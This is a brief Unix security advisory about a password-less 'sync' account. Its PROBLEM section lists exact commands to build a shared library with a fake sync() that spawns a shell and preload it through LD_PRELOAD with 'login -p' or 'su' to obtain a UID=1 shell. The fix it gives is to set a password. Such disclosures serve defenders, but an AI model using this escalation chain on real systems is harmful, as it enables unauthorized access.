COMMAND

    sync(8)

SYSTEMS AFFECTED

    Any system with a password-less "sync" account.

PROBLEM

    Basicly, since "su" passes the full environment, and since "login"
    can be  told to  do so  with the  "-p" option,  you can play games
    with the environment  variables LD_LIBRARY_PATH, LD_PRELOAD,  IFS,
    and so on. For example, to get a UID=1 shell on amy system with  a
    password-less "sync" account:

        % cat > sync.c
        sync()
        {
            execl("/bin/sh", "sh", 0);
        }
        ^D
        % cc -O -R -pic -c sync.c
        % ld -assert pure-text sync.o
        % mv a.out buglib.so.1.1
        % setenv LD_PRELOAD $cwd/buglib.so.1.1

    Then execute:

        % /bin/login -p sync

    or equivalently:

        % /usr/bin/su sync

    Poof! You now have a UID=1 shell. First we set up a library with a
    fake sync() call.  The LD_PRELOAD variable  is an undocumented  on
    that causes any  libraries listed to  be loaded *before*  anything
    else. (You could do the  same with LD_LIBRARY_PATH, but you  would
    have to provide a while C library - this is easier.)

SOLUTION

    Give "sync" a password!